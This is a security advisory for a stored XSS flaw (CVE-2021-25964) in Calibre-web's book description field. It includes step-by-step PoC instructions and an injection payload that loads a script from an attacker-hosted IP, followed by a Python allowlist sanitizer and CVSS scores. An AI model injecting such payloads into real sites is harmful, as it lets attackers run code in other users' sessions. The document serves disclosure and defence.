
CVE-2021-25964
Date: October 4, 2021
Overview
The “Calibre-web” application, versions v0.6.0 to v0.6.12, is vulnerable to Stored XSS in “Metadata”. An attacker who can edit metadata can inject a JavaScript payload into the description field. When a victim opens the book, the XSS is triggered.
Details
The “Calibre-web” application is vulnerable to “Stored XSS” in Metadata. An attacker who has access to edit metadata information can inject a JavaScript payload into the description field. The description is stored without sanitization and sent back inside the page's HTML, so when a victim opens the book's page the payload executes in the victim's browser, in the context of the victim's session.
PoC Details
For demonstration purposes, we will use two users:
1. Alice, a low-privileged user.
2. Admin, an administrator user.
Log in to the application as Alice and open any ebook. Click on Edit Metadata, then click Save and intercept the request. Observe the “description” parameter: its content is sent wrapped in HTML tags. Inject the payload below immediately after the HTML tag and forward the request. The injected payload is saved in the book's metadata.
Log in to the application as Admin (the victim) and click the ebook on the dashboard; the payload is triggered.
PoC Code
// Injected payload after the description parameter
<p>calibre Quick Start Guide</p><script src=http://192.168.0.105:4444/xss.js></script>
// Contents of the xss.js file hosted on the attacker's server (192.168.0.105:4444 in this PoC):
alert("XSS");
Affected Environments
Calibre-web versions v0.6.0 to v0.6.12
Prevention
Update to Calibre-web version 0.6.13. Until the update is applied, limit metadata editing to trusted users, since the attack needs nothing more than edit access to the description field.
Language: Python
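Prevention in code, as an added example that is not Calibre-web's own fix (the project's 0.6.13 change is not reproduced here): a stdlib-only allowlist sanitizer for the description field, plus a minimal stand-in for the book-detail rendering in both the vulnerable form (description inlined as-is, which is what the PoC above exploits) and the hardened form. The tag and attribute allowlist, the helper names and the sample inputs are assumptions chosen for this illustration; in production a maintained sanitizer library is the better choice, but the checks made here (drop unknown elements, drop `<script>`/`<style>` together with their contents, drop every attribute except a short list, reject `javascript:` hrefs even with embedded control characters, re-escape decoded entities) are the ones any such sanitizer must make.

```python
"""Allowlist HTML sanitizer for an ebook description field (stdlib only).

Added illustration, not Calibre-web code. The allowlist below is an
assumption chosen for a book blurb: formatting tags only, nothing that
can carry script or load remote content.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a",
                "h1", "h2", "h3", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}      # no on* handlers, no style, no src
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" = relative URL
CONTENT_DROPPED = {"script", "style"}           # drop the element AND its text

# The payload from the PoC above (attacker host is the PoC's 192.168.0.105).
POC_PAYLOAD = ('<p>calibre Quick Start Guide</p>'
               '<script src=http://192.168.0.105:4444/xss.js></script>')


def _safe_url(value: str) -> bool:
    # Browsers ignore control characters inside the scheme, so "java\tscript:"
    # still executes; strip them before looking at the scheme.
    cleaned = "".join(ch for ch in value if ord(ch) > 32)
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class DescriptionSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities arrive decoded
        self.out = []
        self._dropping = None   # name of the CONTENT_DROPPED element we are in

    def handle_starttag(self, tag, attrs):
        if self._dropping:
            return
        if tag in CONTENT_DROPPED:
            self._dropping = tag
            return
        if tag not in ALLOWED_TAGS:
            return               # drop the tag itself, keep any text inside it
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_url(value or ""):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._dropping:
            if tag == self._dropping:
                self._dropping = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped, so a stored "&lt;script&gt;" stays inert text.
        if not self._dropping:
            self.out.append(escape(data, quote=False))

    # Comments, <!DOCTYPE> and processing instructions carry nothing a blurb needs.
    def handle_comment(self, data): pass
    def handle_decl(self, decl): pass
    def handle_pi(self, data): pass


def sanitize_description(raw: str) -> str:
    p = DescriptionSanitizer()
    p.feed(raw)
    p.close()            # flush text the parser holds back at end of input
    return "".join(p.out)


def render_description(desc: str, hardened: bool = True) -> str:
    """Stand-in for the book-detail template, which inlines the description
    as HTML. hardened=False reproduces the vulnerable behaviour."""
    body = sanitize_description(desc) if hardened else desc
    return f'<div class="description">{body}</div>'


if __name__ == "__main__":
    print("vulnerable:", render_description(POC_PAYLOAD, hardened=False))
    print("hardened:  ", render_description(POC_PAYLOAD))
```

Run it directly to see the PoC payload rendered before and after sanitizing. The sanitizer belongs at the output boundary (or at both save and render): a check applied only on save would leave descriptions that were stored before the fix exploitable.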
CVSS v3 metrics

Metric | Value
---|---
Base Score | 5.4 (Medium; computed from the metrics below)
Attack Vector (AV) | Network
Attack Complexity (AC) | Low
Privileges Required (PR) | Low
User Interaction (UI) | Required
Scope (S) | Changed
Confidentiality (C) | Low
Integrity (I) | Low
Availability (A) | None

CVSS v2 metrics

Metric | Value
---|---
Base Score | 3.5 (computed from the metrics below)
Access Vector (AV) | Network
Access Complexity (AC) | Medium
Authentication (Au) | Single
Confidentiality (C) | None
Integrity (I) | Partial
Availability (A) | None